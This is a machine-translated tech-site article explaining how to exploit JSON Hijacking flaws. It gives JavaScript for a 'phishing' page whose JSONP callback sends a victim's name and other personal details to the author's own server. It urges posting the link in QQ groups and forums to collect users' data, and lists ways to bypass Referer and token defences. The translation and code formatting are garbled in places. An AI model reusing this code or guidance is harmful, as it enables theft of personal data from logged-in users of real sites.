Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use JSON Hijacking in practice. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Preface

The detailed exploitation of JSON Hijacking vulnerabilities is somewhat similar to that of CSRF, but the principle is different. In this article, I will focus on the construction and methods of json cross-domain hijacking.

The excavation of 0x01 loophole

In general, in the process of mining, the History of the burpsuite agent searches and filters some links that cannot have vulnerabilities, as shown in the following figure:

We found the following sensitive information (user Id, user name, user mobile number) in the json format of the return package.

Poc of proof of 0x02 vulnerability

To submit vulnerabilities, poc has to race against the clock in public testing, so the most concise POC is used here.

If the returned data is:

Txf ({"data": {"name": "Tang Xiaofeng"})

Function txf (a) {alert (a.data.name);}

The pop-up window can be as follows:

Fishing to exploit the loophole of 0 × 03

1. Prepare a web server, which I built directly by phpstudy.

Attach the server-side code

Json.php fishing. Html

Txf

Var xmlhttp

Function txf (a)

{

Xmlhttp=new XMLHttpRequest ()

Var x = "http://***.***.***/json.php?name="+a.data.name;

Xmlhttp.open ("GET", x, true)

Xmlhttp.send ()

}

>

Fishing, fool.

Send the phishing link http://***.***.***/ phishing .html to users who have logged in to the site, such as forums, community QQ groups, community post bars, etc., and the server can obtain a large amount of user sensitive data.

Here, take a project of hackone as an example:

Repair and bypass of 0x04 loophole

Because this example is sent by a partner, it has not been repaired, so it has been desensitized, so let's think about how to bypass the repair from the perspective of development repair.

1.Referer whitelist

Subdomain name bypass, filename bypass, empty Referer bypass

two。 Increase token certification

Token is complex enough or server-side encryption is too complex for us to bypass. If token is simple, such as pure numbers, we can try to traverse it.

3. Interface disabled

Invincible operation, can not be bypassed

On how to carry out the actual use of JSON Hijacking to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.